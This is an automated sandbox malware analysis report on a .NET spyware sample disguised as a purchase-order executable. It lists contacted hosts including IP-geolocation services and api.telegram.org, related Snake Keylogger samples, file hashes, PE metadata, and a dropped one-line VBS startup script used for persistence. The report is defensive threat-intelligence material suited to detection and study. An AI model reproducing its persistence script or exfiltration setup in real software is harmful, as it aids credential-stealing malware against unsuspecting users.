http://checkip.dyndns.org/q	PO_63738373663838____________________________________________________________________________.exe, 00000000.00000002.1296947151.00000000032C3000.00000004.00000800.00020000.00000000.sdmp, PO_63738373663838____________________________________________________________________________.exe, 00000000.00000002.1308353668.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp, PO_63738373663838____________________________________________________________________________.exe, 00000000.00000002.1308353668.00000000040F4000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 0000000B.00000002.1494831199.0000000003786000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 0000000B.00000002.1516774520.0000000004572000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3705012521.0000000000415000.00000040.00000400.00020000.00000000.sdmp	false		high
http://reallyfreegeoip.org	InstallUtil.exe, 00000007.00000002.3709580619.0000000003179000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3709580619.000000000324B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3709580619.0000000003210000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3709580619.00000000031F4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3709580619.000000000321E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3709580619.0000000003202000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.0000000002A43000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.00000000029EC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.0000000002A53000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.0000000002970000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.0000000002A08000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.00000000029FA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.0000000002A16000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-net	PO_63738373663838____________________________________________________________________________.exe, 00000000.00000002.1315811358.0000000006B80000.00000004.08000000.00040000.00000000.sdmp	false		high
https://reallyfreegeoip.org	InstallUtil.exe, 00000007.00000002.3709580619.000000000324B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3709580619.0000000003210000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3709580619.00000000031F4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3709580619.000000000321E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3709580619.00000000031A4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3709580619.0000000003160000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3709580619.0000000003202000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.0000000002A43000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.00000000029EC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.0000000002A53000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.0000000002A08000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.000000000299B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.00000000029FA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.0000000002958000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org	InstallUtil.exe, 00000007.00000002.3709580619.000000000322C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3709580619.000000000324B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3709580619.0000000003210000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3709580619.00000000031F4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3709580619.000000000321E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3709580619.00000000031A4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3709580619.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3709580619.0000000003160000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3709580619.0000000003202000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.0000000002A43000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.00000000029EC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.0000000002A53000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.0000000002A08000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.000000000299B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.00000000029FA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.0000000002A24000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.000000000294C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.0000000002958000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.com	InstallUtil.exe, 00000007.00000002.3709580619.000000000324B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3709580619.0000000003210000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3709580619.00000000031F4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3709580619.000000000321E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3709580619.0000000003160000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3709580619.0000000003202000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.0000000002A43000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.00000000029EC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.0000000002A53000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.0000000002A08000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.00000000029FA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.0000000002958000.00000004.00000800.00020000.00000000.sdmp	false		high
http://api.telegram.org	InstallUtil.exe, 00000007.00000002.3709580619.0000000003362000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.0000000002B58000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	PO_63738373663838____________________________________________________________________________.exe, 00000000.00000002.1296947151.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3709580619.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 0000000B.00000002.1494831199.0000000003331000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.0000000002891000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/	PO_63738373663838____________________________________________________________________________.exe, 00000000.00000002.1296947151.00000000032C3000.00000004.00000800.00020000.00000000.sdmp, PO_63738373663838____________________________________________________________________________.exe, 00000000.00000002.1308353668.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp, PO_63738373663838____________________________________________________________________________.exe, 00000000.00000002.1308353668.00000000040F4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3709580619.0000000003160000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 0000000B.00000002.1494831199.0000000003786000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 0000000B.00000002.1516774520.0000000004572000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3705012521.0000000000415000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.3709879973.0000000002958000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
188.132.193.46	erkasera.com	Turkey	42910	PREMIERDC-VERI-MERKEZI-ANONIM-SIRKETIPREMIERDC-SHTR	false
188.114.97.3	unknown	European Union	13335	CLOUDFLARENETUS	false
188.114.96.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	false
132.226.247.73	checkip.dyndns.com	United States	16989	UTMEMUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1549124
Start date and time:	2024-11-05 11:03:50 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 25s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	PO_63738373663838____________________________________________________________________________.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@8/3@5/5
EGA Information:	Successful, ratio: 25%
HCA Information:	Successful, ratio: 95% Number of executed functions: 292 Number of non-executed functions: 35
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target InstallUtil.exe, PID 7776 because it is empty
Execution Graph export aborted for target Keywords.exe, PID 8144 because it is empty
Execution Graph export aborted for target PO_63738373663838____________________________________________________________________________.exe, PID 7248 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: PO_63738373663838____________________________________________________________________________.exe

Simulations

Behavior and APIs

Time	Type	Description
05:04:42	API Interceptor	37x Sleep call for process: PO_63738373663838____________________________________________________________________________.exe modified
05:04:51	API Interceptor	14060988x Sleep call for process: InstallUtil.exe modified
05:05:01	API Interceptor	45x Sleep call for process: Keywords.exe modified
11:04:52	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Keywords.vbs

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exe	Get hash	malicious	Unknown	Browse
	F#U0130YAT TEKL#U0130F #U0130STE#U011e#U0130_xlsx.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse
	SecuriteInfo.com.Win32.RATX-gen.5672.16639.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	rSolicituddecotizaci__n.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	0oyt0YS20b.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	att1-241104022450_PDF.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	Pedido de Cota#U00e7#U00e3o-24110004.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	Pedido de Cota#U00e7#U00e3o-24110004_Pdf.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	ORDEN DE COMPRA ALUMINIOS MANDIA SL 664780.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	Pedido de Cota#U00e7#U00e3o-24110004.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse
188.132.193.46	File07098.PDF.exe	Get hash	malicious	Snake Keylogger	Browse
	dekont_001.pdf.exe	Get hash	malicious	Snake Keylogger	Browse
	dekont_001.pdf.exe	Get hash	malicious	Snake Keylogger	Browse
	PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Get hash	malicious	DarkCloud	Browse
	Contact Form and Delivery Details.png.lnk	Get hash	malicious	Unknown	Browse
	Maersk Shipping Document.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	Maersk Shipping Document.com.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
188.114.97.3	DHL_IMPORT_8236820594.exe	Get hash	malicious	FormBook	Browse	www.figa1digital.services/r2pg/
	TGh6AUbQkh.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	221580cm.nyashkoon.in/EternalLinetoPhpjsPollAuthwindowslocal.php
	QUOTATION_NOVQTRA071244.PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/16zkKlMo/download
	SecuriteInfo.com.Trojan.DownLoader47.46584.19040.8588.exe	Get hash	malicious	Unknown	Browse	servicetelemetryserver.shop/api/index.php
	SecuriteInfo.com.Trojan.DownLoader47.46584.19040.8588.exe	Get hash	malicious	Unknown	Browse	servicetelemetryserver.shop/api/index.php
	Ponta Saheb. PO 4400049817.exe	Get hash	malicious	FormBook	Browse	www.1450thedove.com/z3su/
	URGENT REQUEST FOR QUOTATION.exe	Get hash	malicious	FormBook	Browse	www.bayarcepat19.click/5hcm/
	A4mmSHCUi2.exe	Get hash	malicious	FormBook	Browse	www.awarnkishesomber.space/rmi6/
	18in SPA-198-2024.exe	Get hash	malicious	FormBook	Browse	www.timizoasisey.shop/3p0l/
	lf1SPbZI3V.exe	Get hash	malicious	Lokibot	Browse	touxzw.ir/alpha2/five/fre.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	F#U0130YAT TEKL#U0130F #U0130STE#U011e#U0130_xlsx.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	SecuriteInfo.com.Win32.RATX-gen.5672.16639.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	e-dekont.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	rSolicituddecotizaci__n.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	z9ZGBvizdC6e9usEv.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	0oyt0YS20b.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	att1-241104022450_PDF.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	Pedido de Cota#U00e7#U00e3o-24110004.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	Pedido de Cota#U00e7#U00e3o-24110004_Pdf.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	ORDEN DE COMPRA ALUMINIOS MANDIA SL 664780.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
api.telegram.org	SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	F#U0130YAT TEKL#U0130F #U0130STE#U011e#U0130_xlsx.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SecuriteInfo.com.Win32.RATX-gen.5672.16639.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	rSolicituddecotizaci__n.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	0oyt0YS20b.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	att1-241104022450_PDF.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Pedido de Cota#U00e7#U00e3o-24110004.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Pedido de Cota#U00e7#U00e3o-24110004_Pdf.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	ORDEN DE COMPRA ALUMINIOS MANDIA SL 664780.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Pedido de Cota#U00e7#U00e3o-24110004.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
erkasera.com	File07098.PDF.exe	Get hash	malicious	Snake Keylogger	Browse	188.132.193.46
	dekont_001.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	188.132.193.46
	dekont_001.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	188.132.193.46
	PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Get hash	malicious	DarkCloud	Browse	188.132.193.46

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	F#U0130YAT TEKL#U0130F #U0130STE#U011e#U0130_xlsx.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SecuriteInfo.com.Win32.RATX-gen.5672.16639.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	rSolicituddecotizaci__n.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	build.exe	Get hash	malicious	Stealc, Vidar	Browse	149.154.167.99
	0oyt0YS20b.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	att1-241104022450_PDF.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Pedido de Cota#U00e7#U00e3o-24110004.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Pedido de Cota#U00e7#U00e3o-24110004_Pdf.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	ORDEN DE COMPRA ALUMINIOS MANDIA SL 664780.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
CLOUDFLARENETUS	https://s.id/bFnCb	Get hash	malicious	Unknown	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	104.21.5.155
	Shipping documents.bat.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	172.67.74.152
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	172.67.133.135
	https://de.vour.io	Get hash	malicious	Unknown	Browse	188.114.97.3
	MSI18A.dll	Get hash	malicious	Unknown	Browse	172.67.202.143
	F#U0130YAT TEKL#U0130F #U0130STE#U011e#U0130_xlsx.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	http://mailgoupdate.ubpages.com/office-dropbox/	Get hash	malicious	Unknown	Browse	104.18.41.137
	ByVoN4bhSU.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.5.155
	malware-DONT-RUN.ps1	Get hash	malicious	Unknown	Browse	188.114.96.3
PREMIERDC-VERI-MERKEZI-ANONIM-SIRKETIPREMIERDC-SHTR	File07098.PDF.exe	Get hash	malicious	Snake Keylogger	Browse	188.132.193.46
	Scan_20241030.vbs	Get hash	malicious	FormBook, GuLoader	Browse	46.28.239.165
	dekont_001.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	188.132.193.46
	nabm68k.elf	Get hash	malicious	Unknown	Browse	188.132.241.224
	dekont_001.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	188.132.193.46
	PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Get hash	malicious	DarkCloud	Browse	188.132.193.46
	DRUMMONDLTD _ 21ST_OCTOBER_2024 _.PDF	Get hash	malicious	Unknown	Browse	78.135.79.21
	https://t.ly/k1aDE	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	78.135.79.21
	voicemai____Now_AUD__autoresponse(9.htm	Get hash	malicious	Phisher	Browse	188.132.193.30
	Swift E-Posta Bildirimi_2024-09-23_T11511900.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.132.158.64

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	F#U0130YAT TEKL#U0130F #U0130STE#U011e#U0130_xlsx.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	SecuriteInfo.com.Win32.RATX-gen.5672.16639.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	e-dekont.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	rSolicituddecotizaci__n.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	z9ZGBvizdC6e9usEv.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	0oyt0YS20b.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	att1-241104022450_PDF.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	Pedido de Cota#U00e7#U00e3o-24110004.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	Pedido de Cota#U00e7#U00e3o-24110004_Pdf.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	ORDEN DE COMPRA ALUMINIOS MANDIA SL 664780.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
3b5074b1b5d032e5620f69f9f700ff0e	Shipping documents.bat.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	188.132.193.46 149.154.167.220
	SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exe	Get hash	malicious	Unknown	Browse	188.132.193.46 149.154.167.220
	https://de.vour.io	Get hash	malicious	Unknown	Browse	188.132.193.46 149.154.167.220
	F#U0130YAT TEKL#U0130F #U0130STE#U011e#U0130_xlsx.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	188.132.193.46 149.154.167.220
	malware-DONT-RUN.ps1	Get hash	malicious	Unknown	Browse	188.132.193.46 149.154.167.220
	investment-fund.msi	Get hash	malicious	Unknown	Browse	188.132.193.46 149.154.167.220
	SecuriteInfo.com.Win32.RATX-gen.5672.16639.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.132.193.46 149.154.167.220
	bestgreetingwithbestthingsevermadewithgreatthigns.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher	Browse	188.132.193.46 149.154.167.220
	Request for quotation for the pumps.vbs	Get hash	malicious	FormBook, GuLoader	Browse	188.132.193.46 149.154.167.220
	po_5621565612.vbs	Get hash	malicious	FormBook	Browse	188.132.193.46 149.154.167.220

Process:	C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	393216
Entropy (8bit):	5.582276330082455
Encrypted:	false
SSDEEP:	6144:A99LXSESARSjdqIFdooVB9XtS5vj3AeocE7rri:ADrhY89l3E7r
MD5:	D3E321AE2428648BD5A282D473FB4118
SHA1:	D4495926D8B581725F62E17F12737C8A25217428
SHA-256:	EBC7577A5A30F2110725657A7FD9FB779209C11C3CECC41824DB1D13DC2D1AEE
SHA-512:	A3D45F78C5ED3F33FED8575BAF3D391712495FEBACC2E4871B98377194674F157AF8FF83B1A012DB0C35CCB2B4DB46809F674D4466D5B2D5AF576FBF6DB6A6D5
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 39%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...ki)g................................. ... ....@.. .......................`............`.....................................K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H............g..............................................................(.......(.....0.._....... ........8........E............f...8...S...?...............i.......}...............2...........@...5.......8..... ....8......o...... ....~....{....:z...& ....8o.....o....o....:.... ....8T........i<.... ....~....{....95...& ....8.....(...... ....~....{....9....& ....8....s....%r...po...... ....8.....s....r...ps....(....o...... ....~....{....9....& ....8........E........8...

C:\Users\user\AppData\Roaming\Keywords.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Keywords.vbs

Download File

Process:	C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	87
Entropy (8bit):	4.875382617171198
Encrypted:	false
SSDEEP:	3:FER/n0eFHHo0nacwREaKC5bKXFAnHn:FER/lFHIcNwiaZ5uX6H
MD5:	BA7B46BB618DC0BDCAC8E4D8B86B1FC0
SHA1:	B46A24A24D2B050DE9F670F32FD51E039B43CAE6
SHA-256:	F64F6F89EB5427FA6A7C6E8B33447E25E69E271FC42F4342A526226DD386282E
SHA-512:	AD4E2BDD6773329186DD86EE196ADF1C7C8211C979225694E7AF85525F46E051A7F9C171C8D5935A82934F67EA7C2F376446B6CA804620F00DA5781214CBF670
Malicious:	true
Reputation:	low
Preview:	CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\Keywords.exe"""

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.582276330082455
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	PO_63738373663838____________________________________________________________________________.exe
File size:	393'216 bytes
MD5:	d3e321ae2428648bd5a282d473fb4118
SHA1:	d4495926d8b581725f62e17f12737c8a25217428
SHA256:	ebc7577a5a30f2110725657a7fd9fb779209c11c3cecc41824db1d13dc2d1aee
SHA512:	a3d45f78c5ed3f33fed8575baf3d391712495febacc2e4871b98377194674f157af8ff83b1a012db0c35ccb2b4db46809f674d4466d5b2d5af576fbf6db6a6d5
SSDEEP:	6144:A99LXSESARSjdqIFdooVB9XtS5vj3AeocE7rri:ADrhY89l3E7r
TLSH:	5384D903B697A6A2EA456B36C5DB040087B4E8417FABD73E7D8E13A918C37B6DC01717
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...ki)g................................. ... ....@.. .......................`............`................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4615ee
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6729696B [Tue Nov 5 00:40:11 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
